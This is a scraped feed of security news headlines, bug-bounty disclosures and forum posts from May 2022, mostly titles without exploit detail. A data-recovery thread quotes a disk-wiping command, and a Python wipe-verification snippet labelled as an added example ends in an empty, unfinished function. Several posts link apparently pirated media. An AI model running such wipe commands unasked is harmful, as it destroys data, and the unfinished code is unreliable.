    Du Xiaoman Financial is committed to using technology to provide trustworthy financial services to more people. On April 28, 2018, Baidu’s financial services business group completed its spin-off financing and launched the new brand “Du Xiaoman Financial”.
    Key institutions in Austria and Estonia may be targets of Russian hackers
    The Russian government-backed hacking group Turla is launching a series of attacks on the Austrian Economic Chamber, a NATO platform, and the Baltic Defence College.
    The “Opinions on Advancing the Implementation of the National Cultural Digitization Strategy” are released, again emphasizing data security
    The Opinions specify that by the end of the 14th Five-Year Plan period, cultural digitization infrastructure and service platforms will be largely built, forming a cultural service supply system with integrated online and offline interaction and multi-dimensional coverage.
    General Motors hit by credential stuffing attack, exposing car owners’ personal information
    An investigation found that in some cases the hackers redeemed customers’ reward points for gift cards.
    Payment giant PayPal exposed to major vulnerability; hackers can directly steal user funds
    The attack works by using clickjacking to trick users into clicking, completing a transaction without their knowledge and ultimately stealing funds.
  • Open

    How I Found a company’s internal S3 Bucket with 41k Files
    No content preview
    Cybersecurity & Application Attacks
    Buffer Overflow and XSS Cross-site Scripting attacks for SY0–601 Continue reading on InfoSec Write-ups »
  • Open

    Open redirect bypass
    Flickr disclosed a bug submitted by xlord91: https://hackerone.com/reports/1513031 - Bounty: $300
    Stored XSS in photos_user_map.gne
    Flickr disclosed a bug submitted by keer0k: https://hackerone.com/reports/1534636 - Bounty: $3263
    [python]: Zip Slip Vulnerability
    GitHub Security Lab disclosed a bug submitted by farid_hunter: https://hackerone.com/reports/1572496 - Bounty: $1000
    [Java]: Flow sources and steps for JMS and RabbitMQ
    GitHub Security Lab disclosed a bug submitted by someonenobbd: https://hackerone.com/reports/1579235
  • Open

    How can I download full folders on my android phone keeping directory structure?
    I tried using 1DM but it puts all files into the same directory. I tried using grabber, changing the recursion, batch downloads, etc but I am not getting this to work. I read through the sticky post but it didn't seem to have the answer. Any recommendations? submitted by /u/Terrible_Feature-532 [link] [comments]
    batch of movies
    submitted by /u/wiener_dawg [link] [comments]
    [Request] Anyone has the TV shows: Blossom (1990) & Brotherly Love (1995)
    submitted by /u/ShakeSpearow [link] [comments]
  • Open

    Ukraine Update 5–23–22
    The following are compiled from a variety of sources, and especially from a live Reddit thread which I follow closely. I compile these… Continue reading on Medium »
    War in Ukraine / May 20–22
    Up to 100 Heroes of Ukraine die every day in the East Continue reading on Medium »
    KILLNET, LEGION, MIRAI & co.: A brief OSINT look at the Italian targets and the related risk.
    On May 11 Repubblica reported: “Hacker attack on Italy. What is Killnet, the Russian group that claimed it”… Continue reading on Medium »
    OSINT Course Online (Open-source Intelligence)
    In this course, you will learn about OSINT (open-source intelligence) from a hacker’s point of view. Continue reading on Medium »
    My speech in the Russian Parliament will take place in June
    My speech at the Federation Council of the Russian Federation on the creation in Russia of a specialized center of competence in the field… Continue reading on Medium »
  • Open

    A few Tailscale tricks for security testers
    submitted by /u/MysteriousHotel3017 [link] [comments]
    Hiding MSFVENOM Payloads in USB NIC EEPROM
    submitted by /u/lightgrains [link] [comments]
    Beneath the surface: Uncovering the shift in web skimming
    submitted by /u/SCI_Rusher [link] [comments]
    mx-takeover focuses DNS MX records and detects misconfigured MX records.
    submitted by /u/0xmusana [link] [comments]
    I wrote this more from an "analyze rootkit" perspective, but it's equally valid for "driver bug hunting". Hope you enjoy.
    submitted by /u/0x4ndr3 [link] [comments]
    Exploit Development: No Code Execution? No Problem! Living The Age of VBS, HVCI, and Kernel CFG
    submitted by /u/0xdea [link] [comments]
  • Open

    Bug Bounty Diaries #3
    Hi guys! I’m back and before starting with the new blog I really wanna say THANK YOU to every follower, I’m glad to know that my blogs can… Continue reading on Medium »
    Miniseries: XSS to the core — Pt.2
    In the second part of our mini-series, we are going to look at the types of XSS and what we can do to evade those pesky filters! In the… Continue reading on Medium »
    Postponing TGE
    Dear Hats community, Continue reading on Medium »
    Top 25 SSRF Dorks | Bug Bounty
    Top 25 Server-Side Request Forgery (SSRF) Dorks Continue reading on Medium »
    Broken Object Level Authorization.
    Continuing with vulnerabilities in APIs. Continue reading on Medium »
    Broken User Authentication.
    I intend to share with you some things I learned from books and articles; I believe this can help you. Continue reading on Medium »
    CVE-2022–1813 Blind Command Injection
    This bug was found by Abdulrahman Abdullah. This is a Python-based web application in which there is no proper check on the url parameter which… Continue reading on Medium »
    How I Get Bounty From Takeover Account
    Hi everyone, how are you? I hope you guys are well. I’m RyuuKhagetsu, this is my article in English, sorry if there are any mistakes. I… Continue reading on Medium »
  • Open

    Kind of a Wifi attack that isn't Evil Twin
    I wanted to know what kind of Wi-Fi attack, such as Evil Twin with a captive portal, is possible to implement, and the process or the idea behind it. Thank you submitted by /u/Echowns [link] [comments]
    Best path to cybersecurity as a self-taught developer
    Hello, so I currently have around 5 free months and I wanted to heavily utilize that time towards learning to program. My long-term goal would be to get into the cyber security field but I don't have the money to go for the relevant certifications at the moment. I wanted to know which options any of you think would equip me with the most transferable skills for when I finally make the switch into cyber sec. Because I figure it would be easier to get my foot into the IT industry as a developer. For example, I'm guessing that a full stack web developer would make a good transition into web security, or a software developer would do well in Application security. Given your expertise/knowledge of the field, which path would you take if you were to start out as a developer? submitted by /u/Shogun8693 [link] [comments]
  • Open

    SecWiki News 2022-05-23 Review
    Security Assessment of GitHub Copilot by ourren; PE File Structure Analysis 2 by SecIN Community. For more of the latest articles, visit SecWiki
  • Open

    The Hunt for the Red Team
    Red teaming is an important part of any security program because it gives you a real world exercise to test your security posture. You may… Continue reading on Medium »
    How do Red Team Exercises help CISO to Validate the Security Controls Effectively?
    Red Team Exercises are one of the best ways for CISOs to validate the security controls effectively. Continue reading on Medium »
  • Open

    [Security Bulletin] Fastjson 1.2.80 and earlier versions contain a Throwable ...
    Recently, the Fastjson Develop Team released a fix for a security risk in Fastjson 1.2.80 and earlier versions; this security risk may lead to...
  • Open

    Vulnerability that made us 30 000$ richer
    Article URL: https://www.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/ Comments URL: https://news.ycombinator.com/item?id=31477994 Points: 2 # Comments: 1
  • Open

    Tryhackme’s OWASP Top 10
    So I have made it through a dozen or so hours of Tryhackme’s free learning path and am enjoying it, also have made through the first 6… Continue reading on Medium »
  • Open

    Recurrence and analysis of RPC high-risk Vulnerability(CVE-2022-26809)
    Author: HuanGMz@Knownsec 404 Team Chinese version: https://paper.seebug.org/1906/ 1. Vulnerability introduction It has been more than a month since the high-risk vulnerability CVE-2022-26809 was rep...
  • Open

    FreeBuf Morning Report | South Korean and US presidents join forces against North Korean cyberattacks; cyberattacks on Russia multiply
    The presidents of South Korea and the United States join forces to respond to North Korean cyberattacks.
    Elon Musk “fuels” new cryptocurrency scam
    Recently, scammers have been observed deepfaking videos of Elon Musk and other well-known cryptocurrency advocates to promote the BitVex trading platform and steal deposited currency.
    Google: Predator spyware uses zero-day vulnerabilities to infect Android devices
    State-backed threat actors used five zero-day vulnerabilities to install Predator spyware developed by commercial surveillance vendor Cytrox.
    Cisco fixes IOS XR vulnerability exploited in the wild
    Cisco addressed a medium-severity vulnerability affecting IOS XR software that is being actively exploited in the wild.
    On the final day of Pwn2Own 2022, Windows 11 was hacked three times in a row
    Contestants mainly exploited privilege escalation vulnerabilities in Windows 11.
    Beware: PDFs are spreading malware
    Security researchers discovered a new malware distribution campaign in which attackers embed malicious Word documents in PDF attachments to infect users with malware.
    FreeBuf Morning Report | Conti ransomware gang announces shutdown; US Department of Justice will no longer prosecute white-hat hackers
    According to a policy change announced by the US Department of Justice, good-faith security research that violates the federal hacking law, the Computer Fraud and Abuse Act (CFAA), will no longer be prosecuted.

  • Open

    Secure Home Network
    Hello People, I would like to start making my private network more secure soon. Since I am forced by my provider to use a coaxial connection, this would have to be included in the IAD/router. What would you guys recommend for components for me to set up? Does it make sense to create a VLAN | Subnet on the home network? I don't have a lot of space unfortunately. Thank you in advance! submitted by /u/D3ATHB1RD [link] [comments]
    burp vs zap
    I have been solving PortSwigger labs... And due to Burp Intruder's low speed I switched to ZAP, and now I can't solve a lab even after looking at the solutions... WTF, please put me on the right path!! submitted by /u/Full_Albatross_5636 [link] [comments]
  • Open

    Mortar Loader v2 - 0xsp SRD
    submitted by /u/dmchell [link] [comments]
  • Open

    Ukraine Update 5–22–22
    The following are compiled from a variety of sources, and especially from a live Reddit thread which I follow closely. I compile these… Continue reading on Medium »
    Good sources on the war in Ukraine
    Wanted to share a list of resources that I find useful for researching aspects on the war in Ukraine: Continue reading on Medium »
    Viewing cyber attacks in real time on a world map
    There’s a couple of various resources available to see cyber attacks in real time around the world. These are helpful from an OSINT… Continue reading on Medium »
    Cybersecurity attacks against .RU
    Since the expansion of the war in Ukraine by Russia, there has been a barrage of cyber attacks against the Russian Federation from around… Continue reading on Medium »
    SPY NEWS: 2022 — Week 20
    Summary of the espionage-related news stories for the Week 19 (15–21 May) of 2022. Continue reading on Medium »
  • Open

    Email Verification Bypass by bruteforcing when setting up 2FA
    Evernote disclosed a bug submitted by cyberworlcload: https://hackerone.com/reports/1394984 - Bounty: $150
    Possible Domain Takeover on AWS Instance.
    Rocket.Chat disclosed a bug submitted by samuelsiv: https://hackerone.com/reports/1390782
  • Open

    Bypassing LDAP Channel Binding when LDAP Signing is not Enforced
    Hello folks (nerds), I happened to come across some new research that makes it possible to completely bypass Active Directory (AD) Lightweight… Continue reading on Medium »
    Offensive and Defensive Security: CyberSec teams with Red and Blue Jerseys.
    Red teams simulate attacks in opposition to Blue teams to check the effectiveness of their infrastructure security. These exercises offer a Continue reading on Medium »
  • Open

    How does everyone find the directories?
    I don’t understand how people can find such random things? Do y’all simply google stuff or what? submitted by /u/StupidRedditorBTW [link] [comments]
    All Headspace meditations (till 2020) + Game ROMS of old consoles (GBA, NDS, etc...) + Popular TV shows + more random stuff
    Headspace: http://kbranch.us/public/Headspace%20-%20Meditation%20and%20Mindfulness%20Made%20Simple%20(2018)//) ROMS of old games: http://kbranch.us/public/ROMs/ TV shows: http://kbranch.us/public/tv/ And some more random stuff at http://kbranch.us/public/ submitted by /u/Pelicaros [link] [comments]
    Hundreds of gigabytes of TV series, music and movies. (In Russian)
    http://195.93.160.105/ submitted by /u/i-miss-you-so-much [link] [comments]
    A collection of mostly soviet-era cartoons (cheburashka for example)
    http://www.shchupak.com/multiki/ submitted by /u/i-miss-you-so-much [link] [comments]
    Tesla Service Manuals (Google Drive)
    Tesla Made their official Service Manuals accessible to users from their website www.service.tesla.com. Every PDF File from there, about Every Model, Accessories, Charger, Manuals, is mirrored onto GDrive. Check README file for more details. https://drive.google.com/drive/folders/1SVsmpITqgGbyRXEWGUC35AmPmR1SXRWo?usp=sharing submitted by /u/amritajaatak [link] [comments]
    About 750 academic books and journals from a single publisher
    https://tiendaeditorial.uca.es/descargas-pdf/ Site is the academic press of the Universidad de Cádiz. Most texts are in European Spanish, with a smattering of English and French. Many of the works concern the university or Cádiz. Topics are broad but mostly history, archaeology, linguistics, literature, poetry, with lesser amounts of math, medicine, science, computers, and others. submitted by /u/clarelucebooth [link] [comments]
  • Open

    Miniseries: XSS to the core — Pt.1
    Continue reading on Medium »
    AlbusSec:- Penetration-List 06 Command Injection — Sample
    Hi Information Security folk, I hope you liked the SQL-Injection Sample Series, Where You learned about SQL-Injection In-depth, However… Continue reading on Medium »
    Vulnerability In PayPal worth 200000$ bounty, Attacker can Steal Your Balance by One-Click
    What if I told you that a black hat hacker can steal your money from your bank account & credit card or PayPal balance with one click… Continue reading on Medium »
    2FA Bypass on private bug bounty program due to improper caching mechanism
    Hello All, Continue reading on Medium »
    2FA Bypass on private bug bounty program due to CSRF token misconfiguration
    Hello Friends, Continue reading on Medium »
    A good resource for learning penetration testing tools and methodology
    I was searching the internet and came across a good site to bypass 403, which could help me in many other topics … Continue reading on Medium »
  • Open

    connmap - X11 desktop widget that shows location of your current network peers on a world map
    submitted by /u/jafarlihi [link] [comments]
  • Open

    SecWiki News 2022-05-22 Review
    Incident Response Capability Improvement 3: Simulating Intranet Lateral Movement Attacks (Part 1) by aerfa; Incident Response Capability Improvement 2: Simulating Cryptomining Persistence Attacks by aerfa; Incident Response Capability Improvement 1: Real-world Incident Response Dilemmas and Breakthroughs by aerfa; How to Study So Many Security Articles (Practice Edition) by aerfa. For more of the latest articles, visit SecWiki
  • Open

    hackmyvm Series 9: translator
    This article is only for technical discussion and learning; do not use it for illegal purposes, and any illegal use has nothing to do with the author! All environments are practice targets downloaded online and studied on a local machine.
    MSF Listeners: Bringing a Backdoor Online over Encrypted Traffic
    This test is for learning purposes only; any illegal use has nothing to do with the platform or the author of this article, and you are responsible for it yourself!
  • Open

    Can people with limited IT experience jump relatively straight into digital forensics?
    I’m interested in DF as a field ever since learning about it. I’m curious if I need to know a lot about cyber security and IT or if I can pick it up as I go along? I’m talking about learning. A lot of the posts on Reddit say that you need to know about xyz well before you can get into “DFIR” but what if you’re just interested in digital forensics? submitted by /u/OpalDragonDagger [link] [comments]
    iPhone
    Where can I purchase a Cellebrite or software/product to review phone data such as photos, messages etc.? submitted by /u/PuzzleheadedRemote83 [link] [comments]
    How do you analyze memory acquisition from Windows 10 build 19044?
    Volatility2 does not have a profile beyond build 19041 yet and Volatility3 lacks advanced plugins when it comes to malware analysis. How do you analyze a memory acquisition from Windows 10 build 19044? submitted by /u/jcbaptiste [link] [comments]
    Help needed with digital forensics case
    Hey guys. I’m currently studying a cyber security degree at a university and currently have to conduct digital forensics and form a report on a woman who was suspected of malpractice (case back from 2014). I have evidence but it can be considered circumstantial. I’ve been using Autopsy (which is great), but I feel there is something missing that is tying all my evidence together. I’ve been given all their Windows computer files. If you guys could possibly give me a few places to look at that would be great! Thanks!! submitted by /u/be-10 [link] [comments]
  • Open

    OTP Bypass on Vahak.in
    No content preview
    TryHackMe: Biblioteca
    No content preview
  • Open

    Accidentally posted nudes need help.
    Accidentally posted nudes to my Snapchat story for 9 minutes before I realized and deleted them. The problem is I was so panicked at the time that I didn't check if anyone screenshotted them. Is there any possible way I could reach out to Snapchat and find that deleted story? submitted by /u/KazaixX [link] [comments]
    Computer Forensics Help
    Hi everyone, I'm taking a digital forensics course soon. It'll start in a few weeks, but I would really like some advice or help on where to start. I'm really sorry to be so vague, but I genuinely don't know anything about this topic. I'm not sure where to start or what to do or how to study for it. I tried to google for maybe online textbooks or codelabs or something like that, but I feel like the resources are all over the place and it's just been really overwhelming to start. All the posts I've been reading here...I have no idea what they're talking about. And it's a bit sad because I would love to contribute to some of the discussions here, but I just don't know how. It's the start of summer, so I definitely have more time than usual. So I'd like a really good head start on the course that will start in a few weeks. If you had to give a complete newbie advice on where to start, I'd very very much appreciate it. Thank you! [link] [comments]
    Mac Forensics: Digital Collector vs. Recon RTI
    Greetings r/computerforensics, We've seen a huge decline in Macs hitting our lab over the last few years, but they still sprinkle in every now and then. We're evaluating our current licences and dropping our least used. For our primary Mac tool, we have to decide between Cellebrite Digital Collector and Sumuri Recon RTI. We're leaning to Recon, but would love to hear feedback on what you all are using and why. submitted by /u/BlockchainForensics [link] [comments]
  • Open

    Essential links for SOC Analysts
    Hi everyone. Previously, I shared an article on Essential tools for SOC analysts. Here I wanted to share a link-based post essential… Continue reading on Medium »
    Free DLP and personnel monitoring systems
    Today we will bypass OSINT-ers and make a selection for security people. Employee control systems and DLP. Simple but free: Continue reading on Medium »
  • Open

    Critical Vulnerability in Premium WordPress Themes Allows for Site Takeover
    Article URL: https://threatpost.com/vulnerability-wordpress-themes-site-takeover/179672/ Comments URL: https://news.ycombinator.com/item?id=31461535 Points: 2 # Comments: 0
    $10m bug bounty paid for Wormhole vulnerability
    Article URL: https://medium.com/immunefi/wormhole-uninitialized-proxy-bugfix-review-90250c41a43a Comments URL: https://news.ycombinator.com/item?id=31459244 Points: 2 # Comments: 0
  • Open

    How “Forgot Password” can cost you your account
    Continue reading on Medium »
    CVE-2022–1784 The Ssrf
    In this write-up I am going to tell you about this awesome SSRF found by Hexatron, rewarded with a 900$ bounty Continue reading on Medium »
    A business Logic issue worth $1500
    Hello everyone, Continue reading on Medium »
    PayPal IDOR via billing Agreement Token (closed Informative, payment fraud)
    Continue reading on Medium »
    How I was able to down a service of Microsoft? Denial of Service (DoS) Attack on Microsoft.
    Thank you for taking the time to read about “How I was able to down a service of Microsoft? Denial of Service (DoS) Attack on Microsoft” Continue reading on Medium »
  • Open

    SecWiki News 2022-05-21 Review
    No news updated today. For more of the latest articles, visit SecWiki
  • Open

    Metastealer – filling the Racoon void
    submitted by /u/digicat [link] [comments]
  • Open

    Client Side Bug, EP1 — Cross-site Request Forgery (CSRF/XSRF)
    A bug that will ‘force’ the user to do something dangerous! Continue reading on Medium »
  • Open

    A Brief Look Back at the Exhibition: Pseudosphere by Klára Kusá
    In a small lane right next to Michael’s Gate there is a smaller art gallery - Galéria X. Continue reading on Medium »
  • Open

    A moderately sized GD folder with books and PDFs on hacking, cracking, networking and programming
    https://drive.google.com/drive/mobile/folders/1F7D5c30nP-y_Q7SFqoRTRvJ7tl0UcY3q submitted by /u/idkbutiwannalearn [link] [comments]
    Where can I find 3d character packs for free like businessman billy?
    The businessman billy pack has 2-3 similar packs too it, can someone please help me get them? A female 3d character pack will be ideal, I have only got the businessman billy pack from a local graphic designer's website. submitted by /u/Pythagoras16 [link] [comments]
  • Open

    How to make a used computer safe
    I bought a used MacBook Pro and want to make sure it's safe. I went into recovery mode (Cmd + R on boot) and reinstalled OSX. Is this sufficient to make sure any possible malware has been removed? What additional measures can/should I take to ensure the company is safe? submitted by /u/digitil [link] [comments]

  • Open

    Matryoshka Trap: Recursive MMIO Flaws Lead to VM Escape
    submitted by /u/Bison-Neat [link] [comments]
    When eBPF meets TLS! A Security Focused Introduction to eBPF
    submitted by /u/guedou [link] [comments]
    Hacking Chinese IoT FoR $10000
    submitted by /u/sciencestudent99 [link] [comments]
    A journey into IoT - Unknown Chinese alarm - Part 2 - Firmware dump and analysis
    submitted by /u/0xdea [link] [comments]
  • Open

    Cellebrite advise needed
    Received two (iPhone & Android) UFDR reports and Cellebrite Reader. For the iPhone I decided to export the searches as EML and bring it into our review platform. Reason I went with EML export was because it includes the message attachment within the EML message and our platform extracts it as parent child. It also populates the fields "TO" "FROM" "DATES" with receiver and sender. I am having trouble doing this with the Android. It has no EML export. PDF export would work but it creates hyperlinks with folders for the message attachments. Which makes it more difficult to tie the attachments to the message when I bring it into the review platform. Any suggestions would help. XML export support is on development at the moment. submitted by /u/theedon323 [link] [comments]
    Recovering deleted telegram messages
    What is a good tool that can help me with recovering deleted telegram messages? I have an iPhone with full file system extraction. I have tried Magnet AXIOM and it is able to extract recent telegram chats. It is clear from these chats that some messages were deleted by the user - which AXIOM unfortunately seems to be not able to retrieve. I tried manually searching through the sqlite db but did not have any luck. Oxygen forensics claimed a couple of years ago it could retrieve deleted telegram messages but there has not been a lot of discussion of this topic in the DFIR community since. Are deleted telegram messages a lost cause at this point? submitted by /u/Sea_Cold_7611 [link] [comments]
    Retrieve deleted picture.jpg from image in linux
    As the title says, I want to retrieve a jpg picture from an image I created in Linux using dd. I used the fls command to find the inode of the picture and used it together with the istat command to view the metadata of the file. What I want to do now is basically extract this picture using dd. Like dd if=example.dd of=picture.jpg bs=... skip=... count=..., but there is one problem, I don't know what to enter on bs, skip and count. I've read that I need to calculate something but I feel that I need to understand the whole process in general instead of jumping right into the calculation. Anyone that has some time to explain this to me and maybe give me some examples by extracting something from your own images (if you have one)? Would really appreciate it! Thanks! submitted by /u/ahmedmourad22 [link] [comments]
  • Open

    5 Tips for new leads in Trace Labs Search Party
    I recently participated in the Trace Labs Search Party CTF, if you’re not familiar it’s a non-theoretical OSINT CTF where participants… Continue reading on Medium »
    War in Ukraine / May 19
    👉 Lend-Lease and Western Strategy [Expert View] Continue reading on Medium »
    All Defense Tool
    First of all congratulations on finding the treasure. This project integrates excellent offensive and defensive weapons projects in the… Continue reading on Medium »
  • Open

    Wormhole Uninitialized Proxy Bugfix Review
    Summary Continue reading on Immunefi »
    CVE-2021–43798 Grafana | Unauthorized Arbitrary File Read Vulnerability
    Version 8.3.0 Continue reading on Medium »
    I Obtained ADMIN access via Account Activation link [In 30 seconds]
    Folks, for those of you who didn’t know, I absolutely have a blast every time I have to perform web app testing; because the way to… Continue reading on Medium »
    SSRF Leads To AWS Metadata Exposure
    How can you leverage an SSRF (“Server Side Request Forgery”) vulnerability to evade filters and leak internal AWS credentials on a web… Continue reading on System Weakness »
    Incentivized testing for $ZKP Advanced Staking is now LIVE!
    Advanced $ZKP Staking Testing with 100,000 $ZKP in rewards is starting today. Welcome to Panther Zafari’s Beta! Continue reading on Panther Protocol »
  • Open

    SecWiki News 2022-05-20 Review
    PE File Structure Analysis 1 by SecIN Community. For more of the latest articles, visit SecWiki
  • Open

    This website will shut down soon, but they have an open directory (the C-Disk) full of old pictures and weird software from the '90s/00's
    submitted by /u/dadumir_party [link] [comments]
    knitting patterns
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    deformed dogs and their owners
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Data hoarder archive found
    http://80.56.13.139/arc2/ submitted by /u/jaydenthorup [link] [comments]
  • Open

    Alan c2 Framework v7.0: Hyper-Pivoting
    submitted by /u/aparata_s4tan [link] [comments]
  • Open

    Clickjacking at app.lemlist.com
    lemlist disclosed a bug submitted by ondermedia: https://hackerone.com/reports/1574017
    Arbitrary POST request as victim user from HTML injection in Jupyter notebooks
    GitLab disclosed a bug submitted by joaxcar: https://hackerone.com/reports/1409788 - Bounty: $8690
    Error in Deleting Deck cards attachment reveals the full path of the website
    Nextcloud disclosed a bug submitted by ctulhu: https://hackerone.com/reports/1354334 - Bounty: $100
    Nextcloud Deck : Possibility for anyone to add a stack with existing tasks on anyone's board
    Nextcloud disclosed a bug submitted by supr4s: https://hackerone.com/reports/1450117 - Bounty: $250
    Sensitive files/ data exists post deletion of user account
    Nextcloud disclosed a bug submitted by geekysherlock: https://hackerone.com/reports/1222873 - Bounty: $150
  • Open

    Splunk SPL Queries for Detecting gMSA Attacks
    1 Introduction: What is a group Managed Service Account (gMSA)? If your job is to break into networks, a gMSA can be a prime target for a path to escalate privileges, perform credential access, move laterally or even persist in a domain via a ‘golden’ opportunity. If you’re an enterprise defender, it’s something you need... The post Splunk SPL Queries for Detecting gMSA Attacks appeared first on TrustedSec.
  • Open

    Widespread Swagger-UI library vulnerability leads to DOM XSS attacks
    Article URL: https://portswigger.net/daily-swig/widespread-swagger-ui-library-vulnerability-leads-to-dom-xss-attacks Comments URL: https://news.ycombinator.com/item?id=31447130 Points: 1 # Comments: 0
  • Open

    I Obtained ADMIN access via Account Activation link [In 30 seconds]
    Folks, for those of you who didn’t know, I absolutely have a blast every-time I have to perform web app testing; because the way to… Continue reading on Medium »
  • Open

    Threat Brief: VMware Vulnerabilities Exploited in the Wild (CVE-2022-22954 and Others)
    CVE-2022-22954, one of several recently published VMware vulnerabilities, is being exploited in the wild. Read our observations and recommendations. The post Threat Brief: VMware Vulnerabilities Exploited in the Wild (CVE-2022-22954 and Others) appeared first on Unit42.
  • Open

    Wuzhi Intelligence (雾帜智能): AI and SOAR accelerate automated incident response | Cybersecurity New Force SOLO launch season
    This episode features Fu Kui, founder and CTO of Shanghai Wuzhi Intelligent Technology Co., Ltd., a new force in security operations, presenting the talk "Racing Against the Clock: Accelerating Incident Response".
    2022 Voice of the CISO global insight report | Threat uncertainty and a false sense of security
    High-profile breaches have had far-reaching economic and security consequences, showing the world how fragile critical infrastructure and supply chains are once cybercriminals target them.
    Shanghai Anban Technology job openings
    Shanghai Anban Information Technology Co., Ltd. originated from the Chinese Academy of Sciences' Shanghai Institute of Microsystem and Information Technology and ShanghaiTech University, and is the first domestic company with internationally leading commercial intelligent fuzzing technology.
    Endpoint security | Analysis of Intent redirection vulnerabilities
    Attackers combine the dynamic broadcast-receiver registration flaw pattern in system apps with the Intent redirection flaw pattern, posing a serious threat to devices.
    Conti shut down at light speed? Perhaps it is only being reborn in another form
    One moment it was threatening to overthrow the Costa Rican government, the next it announced it was shutting down? According to Advanced Intel, its internal infrastructure has been taken offline.
    Defending against and handling malicious email
    Phishing email is one of the techniques attackers use most often, and cases of attacks launched through phishing email are everywhere.
    FreeBuf Weekly | Gaming giant Blizzard hit by another DDoS attack; Apple ships emergency update fixing a zero-day
    Happy weekend, FreeBufers. Here is this week's FreeBuf Weekly.
    The strange world of Java framework vulnerabilities
    A framework-vulnerability explainer anyone can follow.
    Official recognition! Tophant (斗象科技) wins the CNNVD Outstanding Technical Support Unit and CNNVD Special Contribution awards
    As a CNNVD first-tier technical support unit, Tophant received the "CNNVD 2021 Outstanding Technical Support Unit" and "2021 Special Contribution" awards.
    RSA Innovation Sandbox roundup | BastionZero: zero-trust infrastructure access service
    RSA Conference 2022 opens on June 6, San Francisco time. The conference's Innovation Sandbox contest, known as the "Oscars of the security industry", draws attention every year and has become the global cybersecurity…
    Major change to the US CFAA: white-hat hackers may no longer be liable
    The Justice Department's revised CFAA charging policy recognizes that security researchers and white-hat hackers act in good faith to "improve technology", so it will no longer prosecute them under the CFAA.
    More useful than penetration testing: how should red team exercises be run?
    For most enterprises, a genuine defense-in-depth strategy should include red team exercises.
    Microsoft detects surge in Linux XorDDoS malware activity
    Activity of a stealthy modular malware used to compromise Linux devices and build DDoS botnets has increased by 254%.
    Nikkei's Asian subsidiary hit by ransomware
    Publishing giant Nikkei disclosed that the group's Singapore headquarters suffered a ransomware attack on May 13.
    Hackers build a "robot" calling site to waste Russian officials' time
    Hackers created a website that lets visitors randomly pick two Russian officials and place a prank call to waste their time.
    FreeBuf customer-side group discussion | Let's talk about "dropping the database"
    The case of the Lianjia DBA who deleted the company's databases shows that database deletion is now an insider risk enterprises must account for; how should they respond?
    Is the ATT&CK framework really just for show?
    A chat about the dark art of putting ATT&CK into practice.
  • Open

    Implementing Security in SDLC
    Introduction Continue reading on InfoSec Write-ups »
    Wireless Penetration Testing (WPA-2 Cracking)
    No content preview
    Cyber Apocalypse CTF 2022 — Web — Intergalactic Post Write-up
    No content preview
    Cyber Apocalypse CTF 2022 — Web — Amidst Us Write-up
    No content preview
    Cyber Apocalypse CTF 2022 — Misc — Compressor Write-up (easy way)
    No content preview
    Cyber Apocalypse CTF 2022 — Web — Kryptos Support Write-up
    No content preview
    Cyber Apocalypse CTF 2022 — Intergalactic Chase Write up
    No content preview
  • Open

    CVE-2022-26809 RPC critical vulnerability: reproduction and analysis
    Author: HuanGMz@Knownsec 404 Team. Date: May 20, 2022. 1. Vulnerability overview. More than a month has passed since the critical vulnerability CVE-2022-26809 was patched in April 2022; in that time, apart from a write-up by L1nk on the trigger conditions of the vulnerable function GetCoalescedBuffer(), there has been no other news. I worked out the trigger logic of the vulnerable function ProcessReceivedPDU(), but was unable to, on a default sys...
  • Open

    Wiping a lot of SSDs
    I work in corporate legal doing e-discovery work. The end of the process for most of my cases involves destruction of the collected data. I've been using DBAN to wipe spinning rust drives for years, as well as SSDs as they started to replace HDDs. The newer laptops with UEFI and no legacy boot make using DBAN challenging. When DBAN didn't work, I'd connect it through a USB adapter, boot into Linux, mount it RW, and just sudo dc3dd wipe=/dev/sdc A few months ago, a co-worker pointed out that an SSD might move data into an overwritten sector while the wipe is in process, meaning that with these processes, we can't be sure that all data's been wiped. We've got two cases that might wrap up in the next few months where I've collected 100+ M.2 2280 SSDs. Most (but not all) of the drives are BitLocker encrypted. In theory I could just clear my hands like a blackjack dealer and say "not my problem; keyless encryption is as good as wiping," but 1) I'm not certain every drive is encrypted, and 2) I'm not certain BitLocker protects everything (boot sector? MFTs?) in an unretrievable manner. Some of the data We could also toss them in a box for Iron Mountain to deal with, but for "reasons" (i.e., some data should pass through as few hands as possible) we'd prefer to know that it's done internally and not handed off to an outside vendor. Physical destruction is an option, but burning through a few thousand dollars in otherwise usable SSDs feels like a waste. These SSDs are all from Dell laptops, but have various SSD manufacturers, including Intel, Lite-On, Samsung, Toshiba, SanDisk, and SK Hynix. I might be able to budget several hundred dollars for hardware or software, but this isn't the kind of thing that I need to do more than once every few years, so a costly one-time solution isn't a good option (compared to swapping out SSDs one at a time in my free time for the next year or so). What approach would you take in this situation? 
submitted by /u/RulesLawyer42 [link] [comments]
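    Two read-only checks a practitioner would run on each drive before calling it done, as an added example that is not part of the thread above: whether sector 0 still carries a BitLocker or NTFS boot sector, and whether sampled reads across the logical address space return anything but zeros. The OEM-ID signatures (`-FVE-FS-` at offset 3 for BitLocker, `NTFS    ` for NTFS) and the image layout are assumptions stated in the code; the sample images are constructed, not real drive data.

```python
"""Post-wipe checks for a drive or image (added example; not from the thread).

Assumptions, labelled as such: a BitLocker volume is identified by the
OEM ID b"-FVE-FS-" at offset 3 of its boot sector and NTFS by b"NTFS    ";
the device is opened as a plain binary file object (e.g. /dev/sdc or a
dd image). Reading is non-destructive.
"""
import io
import sys

BITLOCKER_OEM_ID = b"-FVE-FS-"
NTFS_OEM_ID = b"NTFS    "
SECTOR = 512


def volume_signature(boot_sector: bytes) -> str:
    """Classify what the first sector still looks like after a wipe."""
    oem = boot_sector[3:11]
    if oem == BITLOCKER_OEM_ID:
        return "bitlocker"
    if oem == NTFS_OEM_ID:
        return "ntfs"
    if boot_sector[510:512] == b"\x55\xaa":
        return "boot-sector"      # some other bootable/partitioned layout
    return "unknown"


def sampled_nonzero_offsets(fh, size, chunk=1 << 20, samples=64):
    """Read `samples` chunks spread across the logical address space and
    return the offsets where any non-zero byte survives. An empty result is
    necessary, not sufficient, evidence of a wipe: host reads cannot see
    remapped or over-provisioned flash, which is the co-worker's point."""
    step = max(size // samples, 1)
    hits = []
    for i in range(samples):
        off = min(i * step, max(size - chunk, 0))
        fh.seek(off)
        data = fh.read(chunk)
        if not data:
            break
        if data.strip(b"\x00"):   # non-empty only if a non-zero byte exists
            hits.append(off)
    return hits


def verify_wipe(fh, size):
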